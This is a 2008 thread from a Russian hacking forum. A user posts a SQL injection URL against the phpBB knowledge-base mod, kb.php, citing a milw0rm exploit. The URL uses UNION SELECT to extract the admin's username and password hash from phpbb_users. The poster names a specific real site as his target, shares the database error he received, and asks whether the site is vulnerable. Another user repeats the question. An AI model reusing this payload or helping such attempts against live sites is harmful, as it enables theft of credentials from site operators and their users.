HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по багу моду в phpbb(kb.php)
  #1  
Старый 07.12.2008, 13:56
Azter
Познающий
Регистрация: 01.09.2005
Сообщений: 51
С нами: 10889223

Репутация: 5
По умолчанию Вопрос по багу моду в phpbb(kb.php)

Есть скюль.
http://milw0rm.com/exploits/5243

Код:
kb.php?mode=article&k=1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1
Но в ответ получаю следующее

Цитата:

Could not obtain category information

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY cat_order ASC' at line 3

SELECT * FROM phpbb_kb_categories WHERE parent = 0 AND category_id <> ORDER BY cat_order ASC

Line : 1185
File : /home/balansk/public_html/includes/functions_kb.php
ВОт сам форум balans.kz/index.php

Сам вопрос - так есть там скуля или просто ошибку выбивает? Просто сначала подумал что просто количество колонок не подходит, потом попробовал - подобрать что-то ничего не получилось....

Спасибо!
 
Ответить с цитированием

  #2  
Старый 04.03.2009, 13:48
u36a
Познающий
Регистрация: 18.11.2008
Сообщений: 53
С нами: 9199661

Репутация: 10
По умолчанию

Поддерживаю вопрос, что не так?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...